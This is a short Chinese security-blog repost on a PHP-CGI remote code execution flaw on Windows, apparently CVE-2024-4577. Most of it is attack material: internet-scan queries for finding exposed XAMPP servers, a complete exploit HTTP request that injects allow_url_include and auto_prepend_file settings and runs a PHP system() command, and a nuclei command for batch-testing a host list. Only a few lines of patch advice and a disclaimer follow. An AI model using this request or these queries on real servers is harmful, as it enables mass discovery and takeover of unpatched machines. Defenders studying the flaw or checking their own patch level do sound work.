漏洞描述
漏洞影响版本
-
PHP 8.3 < 8.3.8 -
PHP 8.2 < 8.2.20 -
PHP 8.1 < 8.1.29
网络空间测绘查询
-
header="Xampps_info" -
body="/xampps.jpg" -
(header="location http" && header="xampp") -
body="content="Kai Oswald Seidler" -
title="XAMPP for" -
title="XAMPP Version" -
body="font-size: 1.2em; color: red;">New XAMPP"
漏洞复现
漏洞利用
GET /php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Content-Type: application/x-www-form-urlencoded
REDIRECT-STATUS:1
<?php system("dir");?>
结果示例
批量检测
nuclei.exe -t CVE-2024-4577.yaml -l host.txt
修复建议
-
更新PHP至最新版本,确保所有安全补丁已应用。 -
限制对php-cgi.exe的访问,仅允许可信任的请求通过。 -
检查并更新相关配置,确保不使用容易被绕过的字符编码。 -
强化输入验证,防止恶意输入被直接传递给系统命令执行。
原文始发于微信公众号(云梦安全):PHP CGI Windows平台远程代码执行漏洞技术分析
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论